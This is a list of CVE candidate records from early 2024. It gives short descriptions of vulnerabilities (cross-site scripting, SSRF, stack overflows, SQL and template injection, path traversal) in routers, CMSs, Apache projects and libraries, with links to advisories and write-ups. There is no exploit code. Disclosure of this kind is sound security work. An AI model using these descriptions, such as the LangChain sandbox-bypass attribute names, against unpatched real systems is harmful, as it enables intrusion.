CVE    2024    2763    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.48. Affected by this issue is the function formSetCfm of the file goform/setcfm. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257600. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257600 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257600   |   MISC:VDB-257600 | Tenda AC10U setcfm formSetCfm stack-based overflow   |   URL:https://vuldb.com/?id.257600   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetCfm.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetCfm.md    Assigned (20240321)
CVE    2024    27627    Candidate    A reflected cross-site scripting (XSS) vulnerability exists in SuperCali version 1.1.0, allowing remote attackers to execute arbitrary JavaScript code via the email parameter in the bad_password.php page.    MISC:https://packetstormsecurity.com/files/177254/SuperCali-1.1.0-Cross-Site-Scripting.html    Assigned (20240226)
CVE    2024    27626    Candidate    A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Dotclear version 2.29. The flaw exists within the Search functionality of the Admin Panel.    MISC:https://packetstormsecurity.com/files/177239/Dotclear-2.29-Cross-Site-Scripting.html    Assigned (20240226)
CVE    2024    27625    Candidate    CMS Made Simple Version 2.2.19 is vulnerable to Cross Site Scripting (XSS). This vulnerability resides in the File Manager module of the admin panel. Specifically, the issue arises due to inadequate sanitization of user input in the "New directory" field.    MISC:https://packetstormsecurity.com/files/177243/CMS-Made-Simple-2.2.19-Cross-Site-Scripting.html    Assigned (20240226)
CVE    2024    27623    Candidate    CMS Made Simple version 2.2.19 is vulnerable to Server-Side Template Injection (SSTI). The vulnerability exists within the Design Manager, particularly when editing the Breadcrumbs.    MISC:https://github.com/capture0x/CMSMadeSimple2    Assigned (20240226)
CVE    2024    27622    Candidate    A remote code execution vulnerability has been identified in the User Defined Tags module of CMS Made Simple version 2.2.19. This vulnerability arises from inadequate sanitization of user-supplied input in the 'Code' section of the module. As a result, authenticated users with administrative privileges can inject and execute arbitrary PHP code.    MISC:https://github.com/capture0x/CMSMadeSimple/    Assigned (20240226)
CVE    2024    27613    Candidate    Numbas editor before 7.3 mishandles reading of themes and extensions.    MISC:https://github.com/numbas/Numbas   |   MISC:https://www.numbas.org.uk/blog/2024/03/development-update-march-2024/    Assigned (20240226)
CVE    2024    27612    Candidate    Numbas editor before 7.3 mishandles editing of themes and extensions.    MISC:https://github.com/numbas/Numbas   |   MISC:https://www.numbas.org.uk/blog/2024/03/development-update-march-2024/    Assigned (20240226)
CVE    2024    27572    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the updateCurAPlist function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/updateCurAPlist.md    Assigned (20240226)
CVE    2024    27571    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the makeCurRemoteApList function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/makeCurRemoteApList.md    Assigned (20240226)
CVE    2024    27570    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the generate_conf_router function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/generate_conf_router.md    Assigned (20240226)
CVE    2024    27569    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the init_nvram function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/init_nvram.md    Assigned (20240226)
CVE    2024    27568    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the apn_name_3g parameter in the setupEC20Apn function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/setupEC20Apn.md    Assigned (20240226)
CVE    2024    27567    Candidate    LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the vpn_client_ip parameter in the config_vpn_pptp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.    MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/config_vpn_pptp.md    Assigned (20240226)
CVE    2024    27565    Candidate    A Server-Side Request Forgery (SSRF) in weixin.php of ChatGPT-wechat-personal commit a0857f6 allows attackers to force the application to make arbitrary requests.    MISC:https://github.com/dirk1983/chatgpt-wechat-personal/issues/4    Assigned (20240226)
CVE    2024    27564    Candidate    A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.    MISC:https://github.com/dirk1983/chatgpt/issues/114    Assigned (20240226)
CVE    2024    27563    Candidate    A Server-Side Request Forgery (SSRF) in the getFileFromRepo function of WonderCMS v3.1.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the pluginThemeUrl parameter.    MISC:https://github.com/zer0yu/CVE_Request/blob/master/WonderCMS/wondercms_pluginThemeUrl.md    Assigned (20240226)
CVE    2024    27561    Candidate    A Server-Side Request Forgery (SSRF) in the installUpdateThemePluginAction function of WonderCMS v3.1.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the installThemePlugin parameter.    MISC:https://github.com/zer0yu/CVE_Request/blob/master/WonderCMS/wondercms_installUpdateThemePluginAction_plugins.md    Assigned (20240226)
CVE    2024    27559    Candidate    Stupid Simple CMS v1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /save_settings.php.    MISC:https://github.com/kilooooo/cms/blob/main/1.md    Assigned (20240226)
CVE    2024    27558    Candidate    Stupid Simple CMS 1.2.4 is vulnerable to Cross Site Scripting (XSS) within the blog title of the settings.    MISC:https://github.com/kilooooo/cms/blob/main/2.md    Assigned (20240226)
CVE    2024    2754    Candidate    A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544.    MISC:VDB-257544 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257544   |   MISC:VDB-257544 | SourceCodester Complete E-Commerce Site users_photo.php unrestricted upload   |   URL:https://vuldb.com/?id.257544   |   MISC:https://github.com/wkeyi0x1/vul-report/issues/4   |   URL:https://github.com/wkeyi0x1/vul-report/issues/4    Assigned (20240321)
CVE    2024    27517    Candidate    Webasyst 2.9.9 has a Cross-Site Scripting (XSS) vulnerability. Attackers can create blogs containing malicious code after gaining blog permissions.    MISC:https://github.com/webasyst/webasyst-framework/issues/377    Assigned (20240226)
CVE    2024    27516    Candidate    Server-Side Template Injection (SSTI) vulnerability in livehelperchat before 4.34v, allows remote attackers to execute arbitrary code and obtain sensitive information via the search parameter in lhc_web/modules/lhfaq/faqweight.php.    MISC:https://github.com/LiveHelperChat/livehelperchat/commit/a61d231526a36d4a7d8cc957914799ee1f9db0ab   |   MISC:https://github.com/LiveHelperChat/livehelperchat/issues/2054    Assigned (20240226)
CVE    2024    27515    Candidate    Osclass 5.1.2 is vulnerable to SQL Injection.    MISC:https://github.com/mindstellar/Osclass/issues/495    Assigned (20240226)
CVE    2024    27508    Candidate    Atheme 7.2.12 contains a memory leak vulnerability in /atheme/src/crypto-benchmark/main.c.    MISC:https://github.com/LuMingYinDetect/Atheme_defects/blob/main/Atheme_detect_1.md    Assigned (20240226)
CVE    2024    27507    Candidate    libLAS 1.8.1 contains a memory leak vulnerability in /libLAS/apps/ts2las.cpp.    FEDORA:FEDORA-2024-0a0b1533f7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2B6GZQ3WUVFNAAWFQJAQY7UM4OH5TA/   |   FEDORA:FEDORA-2024-34301311f8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WVOY7E2QWQRVXZTJGI7Z4KXGSU6BGEKH/   |   FEDORA:FEDORA-2024-ef8c8a8b37   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QRV2D4GYUZNZRJHVGFSYSOSZLCETI4E/   |   MISC:https://github.com/LuMingYinDetect/libLAS_defects/blob/main/libLAS_detect_1.md    Assigned (20240226)
CVE    2024    27499    Candidate    Bagisto v1.5.1 is vulnerable to Cross-Site Scripting (XSS) via PNG file upload in the product review option.    MISC:https://github.com/Ek-Saini/security/blob/main/xss-bagisto-v1.5.1   |   MISC:https://github.com/bagisto/bagisto/pull/9474    Assigned (20240226)
CVE    2024    27497    Candidate    Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.    MISC:https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8    Assigned (20240226)
CVE    2024    2748    Candidate    A Cross Site Request Forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker to execute unauthorized actions on behalf of an unsuspecting user. A mitigating factor is that user interaction is required. This vulnerability affected GitHub Enterprise Server 3.12.0 and was fixed in versions 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes/#3.12.1   |   URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes/#3.12.1    Assigned (20240320)
CVE    2024    27456    Candidate    rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions for the .rb files.    MISC:https://github.com/cyu/rack-cors/issues/274    Assigned (20240226)
CVE    2024    27455    Candidate    In the Bentley ALIM Web application, certain configuration settings can cause exposure of a user's ALIM session token when the user attempts to download files. This is fixed in Assetwise ALIM Web 23.00.02.03 and Assetwise Information Integrity Server 23.00.04.04.    MISC:https://www.bentley.com/advisories/be-2024-0001/    Assigned (20240226)
CVE    2024    27454    Candidate    orjson.loads in orjson before 3.9.15 does not limit recursion for deeply nested JSON documents.    MISC:https://github.com/ijl/orjson/blob/master/CHANGELOG.md#3915   |   MISC:https://github.com/ijl/orjson/commit/b0e4d2c06ce06c6e63981bf0276e4b7c74e5845e   |   MISC:https://github.com/ijl/orjson/issues/458   |   MISC:https://monicz.dev/CVE-2024-27454    Assigned (20240226)
CVE    2024    27447    Candidate    pretix before 2024.1.1 mishandles file validation.    MISC:https://github.com/pretix/pretix/compare/v2023.10.2...v2024.1.1    Assigned (20240226)
CVE    2024    27444    Candidate    langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-44467 fix and execute arbitrary code via the __import__, __subclasses__, __builtins__, __globals__, __getattribute__, __bases__, __mro__, or __base__ attribute in Python code. These are not prohibited by pal_chain/base.py.    MISC:https://github.com/langchain-ai/langchain/commit/de9a6cdf163ed00adaf2e559203ed0a9ca2f1de7    Assigned (20240226)
CVE    2024    27440    Candidate    The Toyoko Inn official App for iOS versions prior to 1.13.0 and Toyoko Inn official App for Android versions prior to 1.3.14 don't properly verify server certificates, which allows a man-in-the-middle attacker to spoof servers and obtain sensitive information via a crafted certificate.    MISC:https://apps.apple.com/jp/app/%E3%83%9B%E3%83%86%E3%83%AB%E6%9D%B1%E6%A8%AAinn-%E6%9D%B1%E6%A8%AA%E3%82%A4%E3%83%B3-%E5%85%AC%E5%BC%8F%E3%82%A2%E3%83%97%E3%83%AA/id1439388270   |   URL:https://apps.apple.com/jp/app/%E3%83%9B%E3%83%86%E3%83%AB%E6%9D%B1%E6%A8%AAinn-%E6%9D%B1%E6%A8%AA%E3%82%A4%E3%83%B3-%E5%85%AC%E5%BC%8F%E3%82%A2%E3%83%97%E3%83%AA/id1439388270   |   MISC:https://jvn.jp/en/jp/JVN52919306/   |   URL:https://jvn.jp/en/jp/JVN52919306/   |   MISC:https://play.google.com/store/apps/details?id=com.toyoko_inn.toyokoandroid   |   URL:https://play.google.com/store/apps/details?id=com.toyoko_inn.toyokoandroid    Assigned (20240226)
CVE    2024    27439    Candidate    An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.    MISC:https://lists.apache.org/thread/o825rvjjtmz3qv21ps5k7m2w9193g1lo   |   URL:https://lists.apache.org/thread/o825rvjjtmz3qv21ps5k7m2w9193g1lo    Assigned (20240225)
CVE    2024    27438    Candidate    Download of Code Without Integrity Check vulnerability in Apache Doris. The JDBC driver files used for a JDBC catalog are not checked, which may result in remote command execution. Once the attacker is authorized to create a JDBC catalog, he/she can use an arbitrary driver jar file with an unchecked code snippet. This code snippet will be run when the catalog is initializing without any check. This issue affects Apache Doris: from 1.2.0 through 2.0.4. Users are recommended to upgrade to version 2.0.5 or 2.1.x, which fixes the issue.    MISC:https://lists.apache.org/thread/h95h82b0svlnwcg6c2xq4b08j6gwgczh   |   URL:https://lists.apache.org/thread/h95h82b0svlnwcg6c2xq4b08j6gwgczh    Assigned (20240225)
CVE    2024    2742    Candidate    Operating system command injection vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. An authenticated attacker could execute arbitrary code on the remote host by exploiting IP address functionality.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s    Assigned (20240320)
CVE    2024    2741    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. This vulnerability could allow a remote attacker to trick some authenticated users into performing actions in their session, such as adding or updating accounts through the Switch web interface.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s    Assigned (20240320)
CVE    2024    2740    Candidate    Information exposure vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. This vulnerability could allow a remote attacker to access some administrative resources due to lack of proper management of the Switch web interface.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s    Assigned (20240320)
CVE    2024    27359    Candidate    Certain WithSecure products allow a Denial of Service because the engine scanner can go into an infinite loop when processing an archive file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant 1.0.35-1.    MISC:https://www.withsecure.com/en/support/security-advisories/cve-2034-n1    Assigned (20240225)
CVE    2024    27356    Candidate    An issue was discovered on certain GL-iNet devices. Attackers can download files such as logs via commands, potentially obtaining critical user information. This affects MT6000 4.5.5, XE3000 4.4.4, X3000 4.4.5, MT3000 4.5.0, MT2500 4.5.0, AXT1800 4.5.0, AX1800 4.5.0, A1300 4.5.0, S200 4.1.4-0300, X750 4.3.7, SFT1200 4.3.7, XE300 4.3.7, MT1300 4.3.10, AR750 4.3.10, AR750S 4.3.10, AR300M 4.3.10, AR300M16 4.3.10, B1300 4.3.10, MT300N-v2 4.3.10, X300B 3.217, S1300 3.216, SF1200 3.216, MV1000 3.216, N300 3.216, B2200 3.216, and X1200 3.203.    MISC:https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md   |   MISC:https://gl-inet.com    Assigned (20240225)
CVE    2024    27355    Candidate    An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. When processing the ASN.1 object identifier of a certificate, a sub identifier may be provided that leads to a denial of service (CPU consumption for decodeOID).    MISC:https://gist.github.com/katzj/ee72f3c2a00590812b2ea3c0c8890e0b   |   MISC:https://github.com/phpseclib/phpseclib/blob/978d081fe50ff92879c50ff143c62a143edb0117/phpseclib/File/ASN1.php#L1129   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3749-1] phpseclib security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00002.html   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3750-1] php-phpseclib security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00003.html    Assigned (20240225)
CVE    2024    27354    Candidate    An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. An attacker can construct a malformed certificate containing an extremely large prime to cause a denial of service (CPU consumption for an isPrime primality check). NOTE: this issue was introduced when attempting to fix CVE-2023-27560.    MISC:https://gist.github.com/katzj/ee72f3c2a00590812b2ea3c0c8890e0b   |   MISC:https://github.com/phpseclib/phpseclib/blob/master/phpseclib/Math/PrimeField.php#L49   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3749-1] phpseclib security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00002.html   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3750-1] php-phpseclib security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00003.html    Assigned (20240225)
CVE    2024    27351    Candidate    In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-service attack via a crafted string. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232 and CVE-2023-43665.    CONFIRM:https://www.djangoproject.com/weblog/2024/mar/04/security-releases/   |   MISC:https://docs.djangoproject.com/en/5.0/releases/security/   |   MISC:https://groups.google.com/forum/#!forum/django-announce    Assigned (20240225)
CVE    2024    27350    Candidate    Amazon Fire OS 7 before 7.6.6.9 and 8 before 8.1.0.3 allows Fire TV applications to establish local ADB (Android Debug Bridge) connections. NOTE: some third parties dispute whether this has security relevance, because an ADB connection is only possible after the (non-default) ADB Debugging option is enabled, and after the initiator of that specific connection attempt has been approved via a full-screen prompt.    MISC:https://developer.amazon.com/docs/fire-tv/fire-os-overview.html   |   MISC:https://news.ycombinator.com/item?id=39496861   |   MISC:https://www.aftvnews.com/amazon-blocks-long-running-fire-tv-capability-breaking-popular-apps-with-no-warning-and-giving-developers-the-runaround/    Assigned (20240225)
CVE    2024    2732    Candidate    The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themify_post_slider' shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3056453/themify-shortcodes/trunk/includes/themify-shortcodes.php   |   URL:https://plugins.trac.wordpress.org/changeset/3056453/themify-shortcodes/trunk/includes/themify-shortcodes.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve    Assigned (20240320)
CVE    2024    27319    Candidate    Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.    MISC:https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287   |   URL:https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287    Assigned (20240223)
CVE    2024    27318    Candidate    Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.    MISC:https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20   |   URL:https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479    Assigned (20240223)
CVE    2024    27317    Candidate    In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.    MISC:https://lists.apache.org/thread/ct9xmvlf7lompc1pxvlsb60qstfsm9po   |   URL:https://lists.apache.org/thread/ct9xmvlf7lompc1pxvlsb60qstfsm9po   |   MISC:https://pulsar.apache.org/security/CVE-2024-27317/   |   URL:https://pulsar.apache.org/security/CVE-2024-27317/    Assigned (20240223)
CVE    2024    27315    Candidate    An authenticated user with privileges to create Alerts on Alerts & Reports has the capability to generate a specially crafted SQL statement that triggers an error on the database. This error is not properly handled by Apache Superset and may inadvertently surface in the error log of the Alert exposing possibly sensitive data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.    MISC:https://lists.apache.org/thread/qcwbx7q2s3ynsd405895bx3wcwq32j7z   |   URL:https://lists.apache.org/thread/qcwbx7q2s3ynsd405895bx3wcwq32j7z   |   MLIST:[oss-security] 20240228 CVE-2024-27315: Apache Superset: Improper error handling on alerts   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/3    Assigned (20240223)
CVE    2024    27308    Candidate    Mio is a Metal I/O library for Rust. When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free. For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio. The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected. This vulnerability has been fixed in mio v0.8.11. All versions of mio between v0.7.2 and v0.8.10 are vulnerable. Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable. Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.    MISC:https://github.com/tokio-rs/mio/commit/90d4fe00df870acd3d38f3dc4face9aacab8fbb9   |   URL:https://github.com/tokio-rs/mio/commit/90d4fe00df870acd3d38f3dc4face9aacab8fbb9   |   MISC:https://github.com/tokio-rs/mio/pull/1760   |   URL:https://github.com/tokio-rs/mio/pull/1760   |   MISC:https://github.com/tokio-rs/mio/security/advisories/GHSA-r8w9-5wcg-vfj7   |   URL:https://github.com/tokio-rs/mio/security/advisories/GHSA-r8w9-5wcg-vfj7   |   MISC:https://github.com/tokio-rs/tokio/issues/6369   |   URL:https://github.com/tokio-rs/tokio/issues/6369    Assigned (20240222)
CVE    2024    27307    Candidate    JSONata is a JSON query and transformation language. Starting in version 1.4.0 and prior to version 1.8.7 and 2.0.4, a malicious expression can use the transform operator to override properties on the `Object` constructor and prototype. This may lead to denial of service, remote code execution or other unexpected behavior in applications that evaluate user-provided JSONata expressions. This issue has been fixed in JSONata versions 1.8.7 and 2.0.4. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation. As a workaround, one may apply the patch manually.    MISC:https://github.com/jsonata-js/jsonata/commit/1d579dbe99c19fbe509f5ba2c6db7959b0d456d1   |   URL:https://github.com/jsonata-js/jsonata/commit/1d579dbe99c19fbe509f5ba2c6db7959b0d456d1   |   MISC:https://github.com/jsonata-js/jsonata/commit/335d38f6278e96c908b24183f1c9c90afc8ae00c   |   URL:https://github.com/jsonata-js/jsonata/commit/335d38f6278e96c908b24183f1c9c90afc8ae00c   |   MISC:https://github.com/jsonata-js/jsonata/commit/c907b5e517bb718015fcbd993d742ba6202f2be2   |   URL:https://github.com/jsonata-js/jsonata/commit/c907b5e517bb718015fcbd993d742ba6202f2be2   |   MISC:https://github.com/jsonata-js/jsonata/releases/tag/v2.0.4   |   URL:https://github.com/jsonata-js/jsonata/releases/tag/v2.0.4   |   MISC:https://github.com/jsonata-js/jsonata/security/advisories/GHSA-fqg8-vfv7-8fj8   |   URL:https://github.com/jsonata-js/jsonata/security/advisories/GHSA-fqg8-vfv7-8fj8    Assigned (20240222)
CVE    2024    27305    Candidate    aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio. aiosmtpd is vulnerable to inbound SMTP smuggling. SMTP smuggling is a novel vulnerability based on not so novel interpretation differences of the SMTP protocol. By exploiting SMTP smuggling, an attacker may smuggle or spoof e-mails with fake sender addresses, allowing advanced phishing attacks. This issue also exists in other SMTP software like Postfix. With the right SMTP server constellation, an attacker can send spoofed e-mails to inbound/receiving aiosmtpd instances. This issue has been addressed in version 1.4.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/aio-libs/aiosmtpd/commit/24b6c79c8921cf1800e27ca144f4f37023982bbb   |   URL:https://github.com/aio-libs/aiosmtpd/commit/24b6c79c8921cf1800e27ca144f4f37023982bbb   |   MISC:https://github.com/aio-libs/aiosmtpd/security/advisories/GHSA-pr2m-px7j-xg65   |   URL:https://github.com/aio-libs/aiosmtpd/security/advisories/GHSA-pr2m-px7j-xg65   |   MISC:https://www.postfix.org/smtp-smuggling.html   |   URL:https://www.postfix.org/smtp-smuggling.html    Assigned (20240222)
CVE    2024    27304    Candidate    pgx is a PostgreSQL driver and toolkit for Go. SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control. The problem is resolved in v4.18.2 and v5.5.4. As a workaround, reject user input large enough to cause a single query or bind message to exceed 4 GB in size.    MISC:https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007   |   URL:https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007   |   MISC:https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8   |   URL:https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8   |   MISC:https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4   |   URL:https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4   |   MISC:https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8   |   URL:https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8   |   MISC:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df   |   URL:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df   |   MISC:https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv   |   URL:https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv    Assigned (20240222)
CVE    2024    27303    Candidate    electron-builder is a solution to package and build a ready for distribution Electron, Proton Native app for macOS, Windows and Linux. In electron-builder prior to 24.13.2, on Windows only, the NSIS installer makes a system call to open cmd.exe via NSExec in the `.nsh` installer script. NSExec by default searches the current directory of where the installer is located before searching `PATH`. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file. Version 24.13.2 fixes this issue. No known workaround exists. The code executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer.    MISC:https://github.com/electron-userland/electron-builder/commit/8f4acff3c2d45c1cb07779bb3fe79644408ee387   |   URL:https://github.com/electron-userland/electron-builder/commit/8f4acff3c2d45c1cb07779bb3fe79644408ee387   |   MISC:https://github.com/electron-userland/electron-builder/pull/8059   |   URL:https://github.com/electron-userland/electron-builder/pull/8059   |   MISC:https://github.com/electron-userland/electron-builder/security/advisories/GHSA-r4pf-3v7r-hh55   |   URL:https://github.com/electron-userland/electron-builder/security/advisories/GHSA-r4pf-3v7r-hh55    Assigned (20240222)
